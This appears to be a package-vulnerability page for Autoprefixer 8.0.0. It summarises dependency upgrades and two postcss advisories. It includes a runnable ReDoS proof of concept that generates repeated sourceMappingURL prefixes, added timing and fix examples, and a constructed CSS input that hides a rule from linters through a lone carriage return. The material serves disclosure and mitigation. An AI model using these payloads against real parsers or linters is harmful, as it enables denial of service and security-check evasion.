Autoprefixer 8.0.0 is a dependency-upgrade release over 7.2.6. Both versions do the same core job: parsing CSS and adding vendor prefixes according to Can I Use data, so that the output works across the browsers you target. The differences are in the dependencies: browserslist takes a major-version jump from 2.11.3 to 3.0.0, and caniuse-lite moves from 1.0.30000805 to 1.0.30000808. Because caniuse-lite is where the browser-support data comes from, the newer snapshot means Autoprefixer 8.0.0 prefixes against a more current picture of browser support and CSS feature adoption.
For developers, this means more accurate prefixing for a wider set of target browsers and better handling of newer CSS syntax. The API and everyday usage are unchanged, so moving to 8.0.0 mainly buys current browser data and a lower risk of emitting outdated or unnecessary prefixes. The unpacked size grows slightly, which the updated browser support outweighs for most projects. Keeping these dependencies current keeps the generated CSS aligned with the browsers that the newest browserslist and caniuse-lite versions know about, and the latest major version also carries the bug fixes that shipped with it.
All the vulnerabilities related to version 8.0.0 of the package

Both entries below are reported against postcss, the CSS parser that Autoprefixer runs on and pulls in as a dependency, so Autoprefixer 8.0.0 is exposed through whichever postcss version your install resolves to. The useful check is therefore which postcss version your lockfile actually resolves (npm ls postcss shows it) and whether that version falls inside the affected range named in each entry.
Regular Expression Denial of Service in postcss
The package postcss in versions before 7.0.36 or between 8.0.0 and 8.2.13 is vulnerable to Regular Expression Denial of Service (ReDoS) via getAnnotationURL() and loadAnnotation() in lib/previous-map.js, the code that looks for a /*# sourceMappingURL=... */ annotation comment. The vulnerable regexes are caused mainly by the sub-pattern
\/\*\s* sourceMappingURL=(.*)
Because (.*) is greedy and the remainder of the pattern must still match after it, an input that repeats the annotation prefix many times without ever closing the comment makes the engine backtrack through the rest of the input from every prefix, so parse time grows with the square of the input length. The proof of concept below drives a vulnerable postcss with inputs of increasing size and prints how long each parse takes.
var postcss = require("postcss")

// Build "a{}" followed by n copies of the annotation prefix and no closing "*/",
// so every prefix is a candidate match that can only fail after backtracking.
function build_attack(n) {
  var ret = "a{}"
  for (var i = 0; i < n; i++) {
    ret += "/*# sourceMappingURL="
  }
  return ret + "!";
}

// Warm-up parse of a well-formed annotation.
postcss.parse('a{}/*# sourceMappingURL=a.css.map */')

// Parse ever-larger inputs and print how long each takes; the time per
// input grows far faster than its length.
for (var i = 1; i <= 500000; i++) {
  if (i % 1000 == 0) {
    var time = Date.now();
    var attack_str = build_attack(i)
    try {
      postcss.parse(attack_str)
      var time_cost = Date.now() - time;
      console.log("attack_str.length: " + attack_str.length + ": " + time_cost + " ms");
    } catch (e) {
      var time_cost = Date.now() - time;
      console.log("attack_str.length: " + attack_str.length + ": " + time_cost + " ms");
    }
  }
}
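To see the backtracking without installing a vulnerable postcss, here is an added example (written for this page, not postcss's own code and not the advisory's PoC) that times a regex reconstructed around the sub-pattern above against a regex-free extractor. The exact pattern in lib/previous-map.js is assumed rather than copied, the linear extractor is an alternative written here and not the upstream fix, and buildAttack mirrors build_attack from the PoC.

```javascript
// Added example (not postcss code): the quadratic backtracking behind the
// PoC above, reproduced without postcss, next to a regex-free extractor
// that runs in linear time.

// Assumption: a reconstruction around the sub-pattern quoted in the
// advisory (\/\*\s* sourceMappingURL=(.*)); the real previous-map.js regex
// may differ in details, but a greedy (.*) followed by a literal that never
// appears in the input is what drives the backtracking.
const VULNERABLE_RE = /\/\*\s*# sourceMappingURL=(.*)\s*\*\//;

function extractWithRegex(css) {
  const m = css.match(VULNERABLE_RE);
  return m ? m[1].trim() : null;
}

// Linear-time alternative (added here, not the upstream fix): walk the
// comment blocks with indexOf and never backtrack. Returns the URL of the
// first annotation comment, or null. Unlike the greedy (.*) above, which
// runs on to the last '*/' in the input, it stops at the comment's own end.
function extractLinear(css) {
  const marker = '# sourceMappingURL=';
  let pos = 0;
  for (;;) {
    const open = css.indexOf('/*', pos);
    if (open === -1) return null;
    const close = css.indexOf('*/', open + 2);
    if (close === -1) return null;            // unterminated comment: nothing to extract
    const body = css.slice(open + 2, close).trimStart();
    if (body.startsWith(marker)) return body.slice(marker.length).trim();
    pos = close + 2;
  }
}

// Same shape as build_attack(n) in the PoC: n annotation prefixes, no '*/'.
function buildAttack(n) {
  return 'a{}' + '/*# sourceMappingURL='.repeat(n) + '!';
}

function elapsedMs(fn, input) {
  const start = Date.now();
  fn(input);
  return Date.now() - start;
}

if (typeof require !== 'undefined' && require.main === module) {
  // Doubling n roughly quadruples the regex time; the scanner stays flat.
  for (const n of [500, 1000, 2000]) {
    const s = buildAttack(n);
    console.log(`n=${n} len=${s.length}: regex ${elapsedMs(extractWithRegex, s)} ms, linear ${elapsedMs(extractLinear, s)} ms`);
  }
}
```

Run it with node: the regex column grows roughly four-fold each time n doubles, while the indexOf scanner stays in the low milliseconds, and both return null for the attack input and the same URL for a well-formed annotation. The same shape, prefix(.*)suffix applied to input that contains many prefixes and no suffix, is the general pattern to look for when reviewing regexes that run over untrusted text.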
PostCSS line return parsing error
An issue was discovered in PostCSS before 8.4.31. It affects linters using PostCSS to parse external Cascading Style Sheets (CSS). There may be \r discrepancies, as demonstrated by @font-face{ font:(\r/*);} in a rule. The discrepancy is between how PostCSS and a standard CSS tokenizer treat a lone carriage return (a \r not followed by \n) as a line terminator, which changes where a /* comment is taken to start.
This vulnerability affects linters that use PostCSS to parse external, untrusted CSS. An attacker can prepare CSS so that it contains parts PostCSS parses as a CSS comment; after processing by PostCSS, those parts end up in the PostCSS output as CSS nodes (rules, properties) despite having originally been inside a comment. The practical consequence is that what the linter inspects is not what a browser will apply. Upgrading postcss to 8.4.31 or later fixes the tokenization; where that is not immediately possible, normalizing \r and \r\n to \n before the CSS reaches the parser removes the input the discrepancy depends on.
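As an added illustration (not PostCSS's code), the scanner below models the decision a PostCSS-style tokenizer makes at a '(': test the text up to the next ')' against a bad-bracket pattern and, if it passes, swallow the whole run as one brackets token, so a '/*' inside it never starts a comment. Both patterns are assumptions modelled on the check before and after 8.4.31 rather than copied from the project; SAMPLE is a constructed input built around the page's @font-face snippet with a trailing rule added to show which side of the comment it lands on.

```javascript
// Added example, not PostCSS code. In the old pattern '.' never matches
// '\r', so a '/' that directly follows a lone CR slips past the test and
// "(\r/*)" becomes a single brackets token; the fixed pattern also rejects
// any character followed by '\r'. Both are assumptions, not copied code.
const BAD_BRACKET_OLD = /.[\n"'(/\\]/;      // assumed pre-8.4.31 pattern
const BAD_BRACKET_FIXED = /.[\r\n"'(/\\]/;  // assumed fixed pattern

// Coarse tokenizer: comment, brackets, '(', space, word, single punctuation.
function scan(css, badBracket) {
  const tokens = [];
  let pos = 0;
  while (pos < css.length) {
    const ch = css[pos];
    if (ch === '/' && css[pos + 1] === '*') {
      const close = css.indexOf('*/', pos + 2);
      const end = close === -1 ? css.length : close + 2;   // unterminated: to EOF
      tokens.push(['comment', css.slice(pos, end)]);
      pos = end;
    } else if (ch === '(') {
      const close = css.indexOf(')', pos + 1);
      const content = css.slice(pos, close + 1);
      if (close === -1 || badBracket.test(content)) {
        tokens.push(['(', '(']);            // fall back to a single '(' token
        pos += 1;
      } else {
        tokens.push(['brackets', content]); // swallow everything up to ')'
        pos = close + 1;
      }
    } else if (/\s/.test(ch)) {             // '\r' counts as whitespace here
      let end = pos;
      while (end < css.length && /\s/.test(css[end])) end++;
      tokens.push(['space', css.slice(pos, end)]);
      pos = end;
    } else if ('{};:)'.includes(ch)) {
      tokens.push([ch, ch]);
      pos += 1;
    } else {
      let end = pos;
      while (end < css.length && !/[\s{};:()\/"']/.test(css[end])) end++;
      if (end === pos) end = pos + 1;        // lone '/', quote, etc.
      tokens.push(['word', css.slice(pos, end)]);
      pos = end;
    }
  }
  return tokens;
}

// The comment spans each scanner sees; compare them across the two patterns.
function commentSpans(css, badBracket) {
  return scan(css, badBracket).filter(t => t[0] === 'comment').map(t => t[1]);
}

// Mitigation for pipelines stuck on an older parser: fold CR and CRLF to LF
// before untrusted CSS reaches the linter, so the old check sees a '\n'.
function normalizeLineEndings(css) {
  return css.replace(/\r\n?/g, '\n');
}

// Constructed sample (not from the advisory) around the page's snippet: the
// '.evil' rule is inside the comment for the fixed scanner, outside it for
// the old one.
const SAMPLE = '@font-face{ font:(\r/*);}\n.evil{display:none}/* */';

if (typeof require !== 'undefined' && require.main === module) {
  console.log('old  :', commentSpans(SAMPLE, BAD_BRACKET_OLD));
  console.log('fixed:', commentSpans(SAMPLE, BAD_BRACKET_FIXED));
}
```

With the old pattern the only comment is the trailing "/* */" and ".evil{display:none}" is a real rule; with the fixed pattern the comment opens right after the lone \r and swallows the rest of the input, which is what a browser does too. Normalizing line endings first makes the old pattern behave like the fixed one on this input.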